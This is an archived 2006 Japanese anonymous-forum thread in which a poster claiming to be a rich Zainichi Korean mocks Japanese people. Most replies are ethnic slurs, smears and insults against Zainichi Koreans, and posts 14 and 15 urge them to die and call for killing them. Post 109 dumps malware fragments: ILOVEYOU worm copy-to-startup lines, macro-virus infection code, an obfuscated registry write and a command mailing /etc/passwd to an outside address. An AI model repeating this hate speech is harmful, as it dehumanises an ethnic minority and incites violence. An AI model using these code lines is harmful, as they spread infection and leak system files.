5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

在日朝鮮人(年収3億)だが。日本人てホント無能だよなw

1 :Ψ:2006/10/20(金) 19:46:08.22 ID:MfEt99fy0
パチンコ店、居酒屋、カラオケボックス、風俗
を経営した金が有り余ってしょうがないw

日本人の無能な乞食に恵んでやりたいのだがwww

2 :Ψ:2006/10/20(金) 19:47:24.06 ID:E/Q2m4Gq0
劣等感もって一生いきろ。

3 :Ψ:2006/10/20(金) 19:47:32.45 ID:P+/hjEvG0
佐賀県買ってやれ。

4 :Ψ:2006/10/20(金) 19:47:55.16 ID:OxaceiOv0
そら自分ええ風に言い過ぎや

5 :Ψ:2006/10/20(金) 19:47:58.04 ID:sy1z7o390
3億ウォンで自慢するなやwww

6 :Ψ:2006/10/20(金) 19:49:03.61 ID:Ha5jUN5N0
なんだ、3億ウォンかw

7 :Ψ:2006/10/20(金) 19:49:10.36 ID:Q193Acbp0
>>1は織原城ニ

8 :Ψ:2006/10/20(金) 19:49:27.92 ID:ez4zopnG0
ずりネタ

9 :Ψ:2006/10/20(金) 19:49:39.60 ID:XTcP3r/c0
金余っても劣等感にさい悩まされていてカワイソス

10 :Ψ:2006/10/20(金) 19:50:46.72 ID:KHxZ3QKU0
3億ドンか3億リラか

11 :Ψ:2006/10/20(金) 19:52:15.18 ID:9uHbSmGA0
劣等感が刷り込まれてないと、こんな発想はできない
なんて哀れな民族なんだろう・・

12 :Ψ:2006/10/20(金) 19:52:53.31 ID:k29uh8GZ0
官報の帰化公告を貼りまくれば鬱憤が晴れるかもな。

13 :Ψ:2006/10/20(金) 19:55:08.55 ID:ZYqo/J/20
あははは〜
金では買えないものが手に入らないからこんなスレ立てたんだよね?(・∀・)

そうか、そうか。

かわいそうに。

14 :Ψ:2006/10/20(金) 19:55:39.02 ID:vCp8Yh+b0
今すぐ刺ね

15 :Ψ:2006/10/20(金) 19:55:43.31 ID:gdpihzip0
殺そうぜ在日朝鮮人を
世界の平和のために

16 :Ψ:2006/10/20(金) 19:55:43.46 ID:P0CKy2bY0
>>1
養子になってやっても良い

17 :Ψ:2006/10/20(金) 19:56:29.86 ID:EwyrbOvv0
まともに税金払わないんだから金もたまるでしょうね。
どうせ自慢するなら、きっちり税金納めてからにしても遅くはありませんよ。

18 :Ψ:2006/10/20(金) 19:57:56.88 ID:8JMUIpi/0

朝鮮人の佐賀でツカw
口臭ぇーぞ!

19 ::2006/10/20(金) 19:58:45.45 ID:MfEt99fy0
今も下のほうで
無能な日本人が必死な形相で
玉弾いているwwww

勝てないように出来てるのに
ホントバカだw
ありたとう日本人様w

20 :Ψ:2006/10/20(金) 20:00:37.42 ID:+/ZYU4y90
お金の為とはいえ、汚いやり方が嫌いだからね日本人は。
恥を知らない朝鮮人には勝てんわ。

21 :Ψ:2006/10/20(金) 20:02:52.06 ID:ZwXj2gkaO
そんな金あるならさっさと国にかえれよ。ゴミは消えろ

22 :Ψ:2006/10/20(金) 20:02:55.59 ID:2vNGzlMwO
>>19
額を地面に擦りつけて日本人に感謝しろよ、この気違い在日朝鮮人が。

23 :Ψ:2006/10/20(金) 20:03:54.47 ID:50INliYWO
佐賀に行け

24 :Ψ:2006/10/20(金) 20:04:01.38 ID:aCvYqt7q0
もっと稼いでくれ。それを在日に分け与えろ。
もう、年間1兆円の日本政府からの在日特権は廃止でいいよな。


25 :Ψ:2006/10/20(金) 20:04:02.92 ID:4/foKp6aO
>>1
日本人には持ってない低レベルな発想だな。
議論するに値しない。

26 :Ψ:2006/10/20(金) 20:04:03.30 ID:xdSQ5q1S0
>>1
やっぱ将軍様に貢いでるの?

27 :Ψ:2006/10/20(金) 20:05:24.31 ID:alLO7EZ0O
>>1馬鹿がいっぱい釣れたなwww

28 :Ψ:2006/10/20(金) 20:06:33.00 ID:TwwyCiGh0
俺なんて1回で3億生み出すぜ

29 :Ψ:2006/10/20(金) 20:10:19.67 ID:WhXBhVyX0
恵んでくれよ。


30 :Ψ:2006/10/20(金) 20:13:35.01 ID:P0CKy2bY0
ま、世の中義理人情だの心の豊かさwだの言っても結局金持ってる奴の勝ち
金があれば裕福な暮らしが出来るし、オンナも沢山抱ける。なにより人を動かせるしなー
ここで僻んで文句垂れる暇あったら大金儲けれるよう頑張れば?
資本主義なんだから誰でもチャンスあるよ?


ま、ここで文句垂れてる奴には100万年無理だなwwwwwwww

31 :Ψ:2006/10/20(金) 20:14:25.94 ID:SukMN7p60
と哀れな>>1が申しております

32 :Ψ:2006/10/20(金) 20:15:17.37 ID:escL8x9N0
スパイハケーンで通報

33 ::2006/10/20(金) 20:19:10.84 ID:MfEt99fy0
日本人て
何やっても勝てないんだよなw
スポーツ見てても
点差でリードしてても
勝てる気がしない
結局その通り負けるんだよなww
民族的に負けなんじゃないか?
えーおいw

34 :Ψ:2006/10/20(金) 20:21:34.24 ID:YFhA/VJs0
>>33
本国で稼いでみろよ。 
日本でのうのうと生かして貰ってる分際ででかい口たたくな。



35 :Ψ:2006/10/20(金) 20:23:03.03 ID:ntNSG6X30

政府の売国奴ども、 このスレをよく読めよ!!

おまえらが日本をダメにしたのだからな。


36 :Ψ:2006/10/20(金) 20:24:45.48 ID:IdxIG6qWO
実話年収3億ウォンで納税能力ゼロのゴミキムチン

37 :Ψ:2006/10/20(金) 20:26:59.65 ID:Q+6I4/eX0
妄想と現実の区別のつかないキムチ野郎がまた一人。

38 :Ψ:2006/10/20(金) 20:27:16.46 ID:LAWh+2AE0
>>1
そんな金あったら祖国に送ってやれよ。

39 :Ψ:2006/10/20(金) 20:27:38.21 ID:Ut84h9el0
【日本の癌】サラ金・パチンコ・人材派遣を日本からなくせ
http://www.osaka-minkoku.info/osaka/no-pachinko.htm

40 :Ψ:2006/10/20(金) 20:28:55.36 ID:+OP7MA6q0
年金欲しがって、裁判やってる
バーサンにでもわけてやれ


41 :Ψ:2006/10/20(金) 20:29:20.67 ID:nGQrWIej0
私には怠け者で女癖の悪い暴力男の父と、働き者の母がいた。
高校に入る前に母から、聞いたこと
私の父だと思っていた人は在日2世だった。
でも私の戸籍に父は記載されていない。

小さい頃、知らない男の人に母が「俺の子?」と聞かれていたのを
覚えている(母の最初の夫だった人だと後に知った)

私は、誰の子か分からないけれど、
母の子として日本人で、これ以上の幸福はない。


42 :Ψ:2006/10/20(金) 20:30:06.54 ID:vfpdINMw0
>>1
クソも食える朝鮮人だから出来ることでしょう。
偉いっ! 息がクソ臭いけど

43 :Ψ:2006/10/20(金) 20:31:32.85 ID:mXAKQLCj0
佐賀

44 :Ψ:2006/10/20(金) 20:31:59.62 ID:YFhA/VJs0
>>1
昨日電話しただろが。
早く浄化槽の汲み取りに来やがれよ。

バキュームに「糞尿」マーク忘れるなよ。

45 :Ψ:2006/10/20(金) 20:32:12.65 ID:fcaCctly0



46 :Ψ:2006/10/20(金) 20:33:21.56 ID:QDY08/vc0
三億あっても、三十億あっても
在日朝鮮人の過去は消せないわけネ。



47 :Ψ:2006/10/20(金) 20:33:52.04 ID:LigU+6g30
>>1
朝鮮の人ですかぁ。
人格、歴史、勉強になります。
ぜひ、ほどこしをおぬがいします。3億では少ないのでは?




48 :Ψ:2006/10/20(金) 20:35:57.31 ID:SOX94kiO0
>>30
わざわざ金使わなくても女はなんぼでも抱けますが?
あなたキムチ臭いから特別料金でぼったくられそうだね。

49 :Ψ:2006/10/20(金) 20:37:34.78 ID:TzRC8EfKO
ほんっと日本人は糞
世界各国で恥さらしてるし氏んで欲しい
哀れな日本人

50 :Ψ:2006/10/20(金) 20:40:22.82 ID:IPz902Pr0

 金 よ り 愛 で す よ ・ ・ ・

はああああああ・・・

51 :ニダ:2006/10/20(金) 20:41:54.28 ID:GLtlgh400
>>19 無能な日本人が必死な形相で
玉弾いているwwww

勝てないように出来てるのに
ホントバカだw


→確かにパチンコに興じてる奴はバカだと思う
こういう低脳のクズどもが朝鮮人に豊富な資金を提供しているのがなさけない。


52 :Ψ:2006/10/20(金) 20:42:11.11 ID:D+eUusRy0
タカラの人生ゲームか ○(#゚Д゚)=(  #)≡○)Д`>・∴'.>>1

53 :Ψ:2006/10/20(金) 20:47:08.36 ID:jGudBniW0

下衆な職業で威張ってんじゃねえよバカ


54 :Ψ:2006/10/20(金) 20:48:39.40 ID:ntNSG6X30

今後、ミエをはる人間を「在日だな」ということにした。


55 :Ψ:2006/10/20(金) 20:49:20.16 ID:XSpN6xmKO
まだまだ釣りレベル低し。

56 :Ψ:2006/10/20(金) 20:51:16.11 ID:MU3XpjiHO
ま、ネットでどうこう騒いだって

57 :Ψ:2006/10/20(金) 20:51:41.34 ID:P0CKy2bY0
>>>48
貧乏人の僻みは嫌だねーw

58 :Ψ:2006/10/20(金) 20:52:13.80 ID:DAdMyTG80
佐賀でやれ

59 :Ψ:2006/10/20(金) 20:52:36.32 ID:ntNSG6X30
>>57

在日朝鮮人なの??


60 :Ψ:2006/10/20(金) 20:52:53.60 ID:vfpdINMw0
>>49
あなたはバカか朝鮮人?
世界各国で怪訝されたり嫌われているのはKorea North Korea とNorth Koreaの朝鮮国人民
ですよ、前は中国人は査定と言う風潮が有ったけど今はKoreaのモラルの無さが諸外国で嫌
われてます。 一言で言うと「It is dirty with cowardice」ご覧の在日の皆さん真実を
受け止めましょう。

61 :Ψ:2006/10/20(金) 20:54:16.53 ID:P0CKy2bY0
>>59
あ、俺は違うけど必死に僻んでる奴が面白くてさw

62 :Ψ:2006/10/20(金) 21:00:02.64 ID:nAt6CQWy0
まあ、あれだけ優遇されてりゃ
儲けられない方が無能だと思う。

63 :Ψ:2006/10/20(金) 21:00:37.78 ID:XTJ6Sx0J0
年収3億で「金が余ってる」ねぇ
低脳だなぁw

64 :Ψ:2006/10/20(金) 21:02:54.35 ID:QkpSCiBm0
>>1
犯罪者乙!

65 :Ψ:2006/10/20(金) 21:08:09.93 ID:h8LoqIPy0
戦後混乱期に即時取得した駅前の一等地が成功への第一歩でつか?

66 :Ψ:2006/10/20(金) 21:10:29.62 ID:nGQrWIej0
以前、民団の青年会だか青年部の人達と、話した事有るんだけれど
私の話をしたら、日本国籍でうらやましいって言ってたよ。
親とかに、韓国籍を選ばさされて、結婚も在日としろと言われるって
日本人と付き合っても、在日って事で相手の両親に反対されて別れたりして
辛いって言ってた

日本で暮らす全在日が、裕福って事でもない
民団にも登録してないで、ひっそり何の保障も受けられない底辺の人だけど
日本人として、生活してる人もいる
だから、こんなところで、日本人けなしているのって
やっぱりコンプレックスが有るんだと思う。

67 :Ψ:2006/10/20(金) 21:13:13.60 ID:7eyBY7Xb0
言われてみれば確かに個々の日本人には無能な人が多いような気がする。がそ
れにしてはなんで世界二位の経済力を持つに至ったのだろう。やはり天丼、じ
ゃねえや、天ちゃんがいたからだろうか。

68 :Ψ:2006/10/20(金) 21:17:17.13 ID:KhcsmZsG0
1で抜いたら気持ちよかった・・・はぁhぁ

69 :Ψ:2006/10/20(金) 21:17:51.59 ID:zSEGalic0
>>67
アメリカ様がいたからだろ

70 :Ψ:2006/10/20(金) 21:19:51.84 ID:jaYOz8Si0
在日問題に関心のある方へ

 あの話題の在日コリアンのブログが本になりました!!

 
 ブログの内容に大幅な加筆・修正を加え、さらに読み応えのある深みにあふれた本になりました。

 安部政権による差別政策、
 民族学校の生徒への卑劣な脅迫、
 半島のみならず在日コリアンの生活や人権をも踏みにじる経済制裁、
 嫌韓厨から端を発したネット右翼の台頭、
 
 日本を覆う右傾化の波、軍拡化の恐怖を独自の視点と研究で斬る。

 日本の右傾化に抵抗しないのは右傾化に同意することです。
 アジアの平和を守るために、ヒトラー安部にNO!

 
 すべての在日はぜひ読むべし!!
 11月2日発売!!!


 ttp://www.koreanthe3rd.jp

71 :Ψ:2006/10/20(金) 21:20:02.27 ID:KhcsmZsG0
>>69
戦前に国力は既に世界第2位並みだっただろ

72 :Ψ:2006/10/20(金) 21:20:05.51 ID:2aAn2DNv0
定期的にこんなスレが立つが、カワイソス、、、
俺の友人にも何人も在日がいたが、みな貧乏で劣等感をもっていた。
本当に仲の良かった親友を捜したが、俺の前から逃げてしまった、、、
相当探してまわったが、、、二度と会えなかった、、、
なんと悲しかったことか!俺はそいつの境遇で付き合っていたのではない!
お金があろうが、地位があろうが、そんなことと友情は違うだろう???

在日の連中はカワイソス、、、

73 :Ψ:2006/10/20(金) 21:20:59.90 ID:MFZM4liq0
ちと在日の方に聞きたいのだが、在日の人って朝鮮半島が平和になったら戻るつもりあるの?
それとも朝鮮人として、これからも永久に日本に住む気なの?

もちろん個人で違うのは分かるのだが、どう思ってるのか聞いてみたい。

74 :Ψ:2006/10/20(金) 21:37:57.97 ID:VbyzP0sW0
>>1のIDちょっと羨ましい
日本語がお上手ですね。

75 :Ψ:2006/10/20(金) 21:44:06.72 ID:r9xino4PO
佐賀ネットリ監視

76 :Ψ:2006/10/20(金) 21:46:19.16 ID:nDxHH9/Z0
>>1
日本人は「足りることを知る」もんでねw

余ってるなら恵まれない国の子供に寄付してやってくれ

77 :Ψ:2006/10/20(金) 21:46:46.01 ID:cJE79IZE0
要は年収3億円であっても、朝鮮人に生まれたら終わりだということが、
あんたの発言みれば、結論だな。
朝鮮人って、われわれ日本人が思っている以上に、
卑屈な劣等感から抜けきれないのだろう。
おまえらからは、この地球上の社会に役立とうという意識のカケラも
感じんわ!ボケ!
棺おけの中まで、劣等感を持っていけ!
ハハハハハハハハハハハハハハハハハハハハッ


78 :Ψ:2006/10/20(金) 22:04:31.09 ID:GFarj29j0
3億で選挙権売ってやる

79 :Ψ:2006/10/20(金) 22:08:40.93 ID:j9y6zFZb0
パチンコ店、居酒屋、カラオケボックス、風俗

なのが嫌だ

80 :Ψ:2006/10/20(金) 22:09:59.94 ID:WOUupIED0
詐欺師は嘘をつくのが仕事ですから。

81 :Ψ:2006/10/20(金) 22:11:27.27 ID:aOkd+GdU0
>>1
リアルに言うのが恥ずかしい仕事だぞ。
自慢げに言うのにビックリした。

82 :Ψ:2006/10/20(金) 22:18:29.48 ID:RkNqY2uf0
日本人で無能です。

年収三億になる経営学とノウハウを日本語で教えて下さい。

83 :Ψ:2006/10/20(金) 22:33:50.64 ID:F999E7YH0

駅前再開発 再開発 再開発 再開発 再開発 再開発 再開発 再開発



84 :Ψ:2006/10/20(金) 22:47:07.44 ID:YFhA/VJs0
3億持ってても在日じゃあ...でFA?

85 :Ψ:2006/10/20(金) 22:48:42.75 ID:+NqnhBxE0
3億ウォンでも俺負けてるわ・・・

86 :Ψ:2006/10/20(金) 22:50:29.40 ID:PFMaQIpw0
3億ペリカだろ。
早く地上に出て来い。

87 :Ψ:2006/10/20(金) 22:52:30.22 ID:YFhA/VJs0
>>1が本当に3億持ってたとしても何だか羨ましく無いのは何故?

88 :Ψ:2006/10/20(金) 23:19:25.60 ID:/K+C6SSc0
将軍様に貢ぐんじゃないだろうな!!

89 :Ψ:2006/10/20(金) 23:26:02.37 ID:yU1+RAv10
 在日韓国人・在日朝鮮人は、うまく日本人から搾取する仕組みをつくりあげたものだ。
彼らはたいへんに賢い。
 日本人も、いままでのように、まじめに働くことだけ考えるのではなく、彼らから搾取
されない賢さをもたないと、いつまでも彼らにいいように使われるだけだ。

90 :Ψ:2006/10/20(金) 23:53:10.45 ID:yf+VbSwz0
日本人でもない、韓国人でもない、北朝鮮人でもない 何者?

91 :Ψ:2006/10/21(土) 00:26:50.71 ID:jejC1XwG0
『収入』は3億、そりゃ結構・・・
で、『所得』は如何ほど、ちゃんと『税金』納めてます・・・?

どうせ自慢するなら納税額を(本名・通名添えて)ドーンと公開して欲しいな!

92 :Ψ:2006/10/21(土) 02:03:34.48 ID:IgwY65yJ0
きむあげは

93 :Ψ:2006/10/21(土) 02:06:41.34 ID:Dd/7tyvj0
ありたとう!

94 :Ψ:2006/10/21(土) 03:41:45.35 ID:SRvVD/bT0
>>1は日本人、に牛乳瓶のフタ2万枚

95 :Ψ:2006/10/21(土) 03:55:06.36 ID:w7cl0J9D0
>>70
「日本の右傾化に抵抗しないのは右傾化に同意することです。 」
基地外ハケーン
北に金送った金大中とノムといいヒトラー以下

96 :Ψ:2006/10/21(土) 04:12:59.42 ID:Ym3h7qRN0
日本は国税庁という切り札を持っているので大丈夫です

97 :Ψ:2006/10/21(土) 06:13:42.32 ID:So/kmvXr0
あぶく銭はあっても貧しい民度...
これが朝鮮クオリティー
人としての常識から学んで出直せ!

98 :Ψ:2006/10/21(土) 06:36:45.40 ID:zVTG7u4c0
金もってる在日は
息子を私立医にでもいれて
医師にしようとする
かれらもパチンコ屋や高利貸し屋は実はいやなんだよ

99 :Ψ:2006/10/21(土) 06:41:02.38 ID:SvQGMJxp0
日本は自分で核被爆国というが、韓国や中国の人達もたくさん死んでいる
日本は韓国や中国に対して謝罪し、補償をしていくべきだな
当時広島や長崎にいた韓国の被爆者達がかわいそう・・・

もしそれがなされないのなら、北朝鮮や中国の核でもう一度攻撃されても
いいのかもしれない・・・ 

日本の皆さん、よく考えてください


100 :Ψ:2006/10/21(土) 06:42:15.22 ID:L6TFDmDgO
>>1 で?

101 :Ψ:2006/10/21(土) 07:12:02.72 ID:IL/5x1e00
>>94
牛乳瓶のフタ、全部で4万円で売ってくれんか?

102 :Ψ:2006/10/21(土) 07:22:12.12 ID:aBiNuRBtO
>>1飢えた同胞どうにかしてやれよ。
もしくは失敗核開発に寄付してやれ。で祖国に爆弾落とされ爆死と
悲惨な運命なですな哀れ

103 :Ψ:2006/10/21(土) 09:42:27.97 ID:wp4Fef480
謝罪も賠償もしました。日本のマスコミは報道しないし、日本の学校も教えませんが。
日本に核攻撃をせよなどと、被害を本当に受けた人間なら言えないはずです。
日本の現実社会では、在日の皆さんが言われているような被害など聞いたことがありません。
在日の皆さんも、日本人も、日本社会のなかで平穏に生きていかねばなりません。
在日の皆さん、よく考えてください。


104 :Ψ:2006/10/21(土) 09:50:34.02 ID:MAjjI5Qi0
チョンは常に大風呂敷広げるな

105 :Ψ:2006/10/21(土) 10:02:02.15 ID:zyLAYlSQ0
ぶはは。卑屈な>>1。はやくキムチと糞臭い国に帰れよwwwwwwwくさいからw

106 :Ψ:2006/10/21(土) 10:09:47.49 ID:KyJmAN3s0
>>103
つーか、謝罪何度やってもダメ、
賠償してもしてないことにされるんだから、
こんなやつらとまともに付き合えるか。
むしろ、併合時代の投下資本を回収したいくらいだ。
俺もネットで偏らない情報を知るまでは頭を狂わされていたが、
今ではこいつらがむかついて仕方がない。

107 :Ψ:2006/10/21(土) 10:52:16.88 ID:wp4Fef480
 在日の皆さんは、韓国や北朝鮮へ帰りたいのですか?
 そうでないならば、日本で子々孫々まで平穏に生きていきたいならば、
日本人への蔑視と、特権を振りかざすことをやめたほうがいいですよ。
 今は日本人はおとなしくしてますが、在日の人たちが戦後から今まで
日本人に対してやってきたことを知れば、今の平穏な状況は崩れますよ。
 日本人はまじめに働いても年収300万円も難しいという人は増えます。
その人たちの不満が現実社会でどこに向かっていくか。
 いまのうちに日本社会に溶け込もうという気はないですか?

108 :Ψ:2006/10/21(土) 13:21:02.75 ID:PmW1+0v80
>>107
日本の人たちの多くは、世界一ずるがしこいですが、いい人もたくさんいるので、
韓国や中国の被害者の方々やそのご家族達に補償をしていくべきです。
特に、日本の方々が年金制度で集めたお金は、まず植民地支配で被害を受けた
韓国のおじいさんやおばあさん達に優先的に支払われるべきです。

韓国や中国などアジアの人たちがどんなに苦痛を受けてきたか・・・・
考えると毎日悲しいです・・・・・・・

日本の皆さん、よく考えてください


109 :Ψ:2006/10/21(土) 14:32:28.37 ID:q+UggPkN0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)